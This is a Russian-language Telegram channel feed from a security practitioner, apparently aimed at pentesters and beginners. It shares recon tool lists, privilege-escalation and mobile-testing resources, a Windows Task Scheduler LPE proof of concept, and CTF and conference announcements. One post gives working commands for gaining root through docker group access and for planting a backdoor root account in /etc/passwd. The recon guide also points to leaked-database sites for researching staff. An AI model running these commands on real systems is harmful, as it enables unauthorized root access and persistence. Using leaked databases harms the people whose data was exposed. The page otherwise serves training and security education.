6.99K subscribers
244 photos
19 videos
29 files
515 links
Yet another hacker

Я Егор Богомолов, с 2015 в кибербезе, основатель проектов Singleton Security и CyberEd.

На канале разбираю новости из мира кибербезопасности через призму личного опыта, делюсь инсайтами, шучу шутки.

По вопросам - @Marta_Irinos
Download Telegram
#hacking #osint #reconnaissance
Предлагаю для изучения небольшой мануал для проведения мероприятий по рекогносцировке в сети.
Разведка

Начальные условния:
* Имя компании;
* Доменное имя;
* IP адрес(а);

Цели:
1. Получить IP адреса принадлежщие компании
2. Получить доменные имена второго и третьего уровней принадлежащие компании
3. Собрать информацию об имеющихся публичных сервисах компании
4. Собрать информацию об используемых компанией технологиях
5. Собрать информацию о сотрудниках компании

Средства:
Шаги 1-2:
* host, nslookup, dig (Типы запросов: NS,ANY,TXT,AXFR,PTR...)
* whois (Получаем netblock и дополнительную информацию о принадлежности адреса какой-либо организации )
* Search engines:
- http://searchdns.netcraft.com/;
- https://www.shodan.io/host/;
- https://censys.io/
- https://community.riskiq.com/
- http://whois.webhosting.info/x.x.x.x
- http://google.com (inurl, site, filetype, cache, etc...)

* Recon-ng (All in the box)
* DNSrecon (DNS enumeration, revers lookup, scanning, whois recon)
* Amass (Very fast brute)
* subfinder (Brute and finding)
* Aquatone (Using pablic services like: shodan, censys, riskiq...)

Шаг 3:
* Shoodan.io (Информация о портах и сервисах)
* Nmap (Сканирование и поиск открытых портов)
* Eye-witness (Скриншоты интерфейсоф публичных сервисов)
* Web-Cache (Google Cache, Web Archive)

Шаг 4:
* Wappalyzer (Web анализ используемых технологий)
* BurpSuite (Проксируем трафик и используем VulnersDB плагин)
* Nmap (Ключ -sV - определение используемых версий ПО, -O - определение версий ОС)
* Наблюдение и опыт

Шаг 5:
* http://people.yandex.ru/ (Агрегированный посик людей в различных социальных сетях)
* http://vk.com, http://ok.ru, http://facebook.com (Социальные сети)
* TheHarvester, Z-Harvester (Поиск e-mail адресов в публичном доступе)
* Recon-ng (domains-contacts,companies-contacts, domains-creds)
* Leaked databases (http://databases.today/, http://snusbase.com/)
* FOCA (https://www.elevenpaths.com/labstools/foca/index.html) (Поиск документов различных форматов в веб-приложениях и публичных сервисах принадлжащих компании)

Дополнительно:
* http://osintframework.com/
1
#hacking #mobileApp

Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
#hacking #privilageEscalation

Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
#hacking #macos

Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest

Easy way:
brew install sidaf/pentest/recon-ng
#professional #hacking #windows #exploit

Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.

Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.

Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/

На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/

Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar

Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE

На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.

Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).

Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.

Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
#hacking #mobileApp #professional

Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.

https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
#hacking #knowledge #tg

По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.

P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.

Каналы:
https://xn--r1a.website/antichat - легендарный форум Antichat перешел в Tg.
https://xn--r1a.website/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://xn--r1a.website/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://xn--r1a.website/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://xn--r1a.website/xakep_ru - официальный канал журнала Хакер
https://xn--r1a.website/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://xn--r1a.website/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://xn--r1a.website/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://xn--r1a.website/infosecmemes - самое важное в нашем деле - это мемы
https://xn--r1a.website/cyberpunkyc - один известный хаккер со своим мнением
https://xn--r1a.website/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://xn--r1a.website/webpwn - канал известного хакера из сферы Application Security
https://xn--r1a.website/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://xn--r1a.website/cybershit - канал с актуальщиной в мире ИБ
https://xn--r1a.website/github_repos - интересные репозитории со всего мира

Чаты:
https://xn--r1a.website/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://xn--r1a.website/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://xn--r1a.website/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://xn--r1a.website/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям

Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
#professional #hacking #LPE

Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)

Если на скомпрометированной машине команда id показывает, что текущий пользователь принадлежит группе docker, значит существует возможность получить доступ к ОС от имени пользователя root командой:

$ docker run -it --rm -v /:/mnt bash

Следующий шаг, добавить бэкдор командой (Учетные данные: toor/password):

# echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd

Ссылка на оригинал:
https://twitter.com/4lex/status/1035932897407115264
#hacking #ctf #beginners

Ребята из spbCTF открывают новый сезон обучения. В этом сезоне речь пойдет о Attack/Defence CTF соревнованиях.
Вводный стрим по ссылке: https://www.youtube.com/watch?v=ELMRyKkHFXU
В описании к видео ссылка на регистрацию и на прочие подробности.
Всем, кому интересно развиваться в направлении CTF соревнований, очень рекомендую.
#research #books

Много кому из новичков, а также уже сформировавшимся профессионалам, будет интересно почитать ежегодное издание PositiveResearch от компании Positive Technologies, которое рассказывает о произошедшем в сфере информационной безопасности за год. Здесь и атаки на коммерческие структуры, разборы новых уязвимостей, статистика и прочее, прочее.

Рекомендую ознакомиться:
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Positive-Research-2018-rus.pdf
#hacking #professional #lpe

Полезный набор техник по закреплению, пост-эксплуатации, повышению привилегий в различных системах:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
#informationSecurity #cources #beginers

Инфосистемы JET открывает серию вебинаров по информационной безопасности для начинающих специалистов.
Скорее всего предвидеться много воды, но для ознакомления с терминологией и трендами рекомендую новичкам.
https://habr.com/company/jetinfosystems/blog/423477/

Ссылки на все вебинары:

1. Вебинар «Основные термины ИБ», 4 октября с 16.00 до 18.00.

2. Вебинар «Стандарты ИБ», 9 октября с 16.00 до 18.00.

3. Вебинар «Требования ИБ», 11 октября с 16.00 до 18.00.

4. Вебинар «Технологии ИБ», 16 октября с 16.00 до 18.00.

5. Вебинар «Тренды ИБ», 18 октября с 16.00 до 18.00.
#beginners #video #ctf

Широкоизвестный обладатель канала LiveOverflow (о хакинге, CTF’ах и пр. связанным с ИБ) рассказывает о своем первом опыте игры в Attack/Defense CTF на Defcon Las Vegas 2018.
Интересно посмотреть даже тем, кто уже знаком с данным мероприятием.

https://www.youtube.com/watch?v=RXgp4cDbiq4
#events

15-16 ноября будет конференция OFFZONE в Москве (Digital October). Продажа билетов уже стартовала. Ценник - 5000 рублей. Официальный сайт - offzone.moscow. Репост анонса в другие чаты приветствуется)

Больше подробностей про формат конференции можно почитать в анонсе на хакере - xakep.ru/2018/09/03/offzone-2018/

К тому же у нас до сих пор открыт CFP, так что если есть желание что-нибудь зачитать - велкам) Дедлайн 5 откября. Форму подачи доклада можно найти на сайте.
#hacking #beginners #professional #sqlInjection

Полезная WIKI по SQL-Инъекциям. Разобраны все аспекты эксплуатации инъекций с примерами для MYSQL, Oracle, SQL-Server.

https://sqlwiki.netspi.com/
#hacking #web

Portswigger (Разработчики продукта BurpSuite) объявили номинацию «Top 10 Web Hacking Techniques of 2017».
В качестве кандидатов на странице представлены более 30 крутейших историй взлома компаний через веб-приложения.
Голосование уже завершено, но с историями все еще можно ознакомиться. В ближайшее время ждем результатов номинации.

https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017-voting-open
#ctf #quest

Рекомендую новичками интересный квест от группы Defcon-NN. Когда-то сам успел в него поиграть и взять первое место на PhDays в прохождении этого квеста. Сейчас ребята его доработали и запускают заново. Сложность задач ниже среднего, очень полезно для изучения азов хакинга, т.к. столкнетесь с разными ситуациями и инструментами.
Forwarded from Wire Snark
DefHack 2018.9: Виноградный Джо
или Как сисадмин Виноград оказался не таким уж неуловимым.

Приглашаем принять участие в первом дополнении нашего хакерского квеста DefHack на конференции NeoQUEST-2018! Онлайн-доступ будет открыт с завтрашнего утра, 26 сентября. Подробнее по ссылке http://defcon-nn.ru/defhack.

В квесте представлен виртуальный мир анти-утопии, по которому вам предстоит путешествовать, выполняя различные задания. Всё начинается с поступления на работу в отдел расследования инцидентов Ё-корп. Распутывание дел в роли "белого" хакера приведет вас к встрече с интересными противниками — вы познакомитесь с яркими представителями группировок в "серых" и "чёрных" шляпах. Каждый ваш шаг сказывается на окружающем мире, отражаясь через призму новостного сайта корпорации. По мере того, как вы узнаете стороны конфликта получше, вам, как и в жизни, представится возможность выбора. От того, чью сторону вы примете, зависит судьба этого мира.

Категории заданий, включенные в версию DefHack 2018.9:
- форензика, расследования (сеть, диск)
- веб
- разведка, osint
- mitm
- brute-force
- pwn
- повышение привилегий
- смарт-контракты Этериум

Кроме того, вам представится возможность поработать с сетью Tor, причем не только через браузер, но также потребуется перенаправлять в неё трафик приложений (например, с помощью torsocks). Мы рекомендуем использовать какой-либо дистрибутив Linux.

Участвовать можно как в одиночку, так и в команде. Сложность большинства заданий — легкая или средняя, они вполне по силам любому админу, программисту, тестировщику, и тем более пентестеру. По каждому заданию можно получить внутриигровую подсказку, привязанную к контексту вашего текущего прогресса. Для вопросов к организаторам есть выделенный телеграм-чат @defhack2018_neoquest.

Составляя задания, мы старались приблизить их к реалистичным, потенциально возможным ситуациям. Большинство заданий, надеемся, полезны и для отработки базовых методов атаки, и понимания возможных методов защиты.
#CTF #beginners #hacking

Появилась интересная бета-версия площадки https://attackdefense.com/. Площадка дает задачи по разным направлениям по типу задач CTF. Уровень задач easy-medium (Основываясь на первом взгляде). Рекомендую новичкам, кому хочется изучать не в глубь, а в ширь.